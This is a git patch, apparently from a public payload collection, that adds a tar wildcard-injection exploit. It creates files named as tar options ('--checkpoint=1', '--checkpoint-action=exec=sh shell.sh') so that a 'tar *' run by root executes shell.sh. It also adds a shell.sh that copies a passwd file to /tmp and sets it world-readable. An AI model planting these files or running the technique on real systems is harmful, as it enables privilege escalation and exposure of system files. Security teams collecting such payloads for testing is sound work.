From bed3967509bda62937c806bf1573b4f904ea1f6a Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Tue, 18 Oct 2016 18:36:18 +0700
Subject: [PATCH] Tar command exec

---
 README.md                                          |  6 +++---
 TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh |  0
 TAR_Code_Exec/--checkpoint=1                       |  0
 TAR_Code_Exec/README.md                            | 14 ++++++++------
 TAR_Code_Exec/shell.sh                             |  3 +++
 5 files changed, 14 insertions(+), 9 deletions(-)
 create mode 100755 TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh
 create mode 100755 TAR_Code_Exec/--checkpoint=1
 create mode 100755 TAR_Code_Exec/shell.sh

diff --git a/README.md b/README.md
index 6831bc4..00663cc 100644
--- a/README.md
+++ b/README.md
@@ -1,11 +1,9 @@
 # Payloads All The Things
-A list of every usefull payloads and bypass for Web Application Security
+A list of usefull payloads and bypasses for Web Application Security
 
 TODO:
 * XSS
-* Upload
 * Traversal Directory
-* Tar
 * PHP Serialization
 * CSV Injection
 
@@ -14,5 +12,7 @@ To improve:
 * SQL injection
 * XXE
 * SSRF
+* Upload
+* Tar command exec
 
 # /!\ Work in Progress : 1%
diff --git a/TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh b/TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh
new file mode 100755
index 0000000..e69de29
diff --git a/TAR_Code_Exec/--checkpoint=1 b/TAR_Code_Exec/--checkpoint=1
new file mode 100755
index 0000000..e69de29
diff --git a/TAR_Code_Exec/README.md b/TAR_Code_Exec/README.md
index c707ab4..d842476 100644
--- a/TAR_Code_Exec/README.md
+++ b/TAR_Code_Exec/README.md
@@ -1,12 +1,14 @@
-# Title
-Lorem	
+# TAR Command Execution
+By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.	
 
-## Vuln
+## Exploit
 
+These files work against a "tar *"
 ```
-Code
+--checkpoint=1
+--checkpoint-action=exec=sh shell.sh
+shell.sh   (your exploit code is here)
 ```
 
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* 
\ No newline at end of file
diff --git a/TAR_Code_Exec/shell.sh b/TAR_Code_Exec/shell.sh
new file mode 100755
index 0000000..8473b30
--- /dev/null
+++ b/TAR_Code_Exec/shell.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+cat /passwd > /tmp/flag
+chmod 777 /tmp/flag
\ No newline at end of file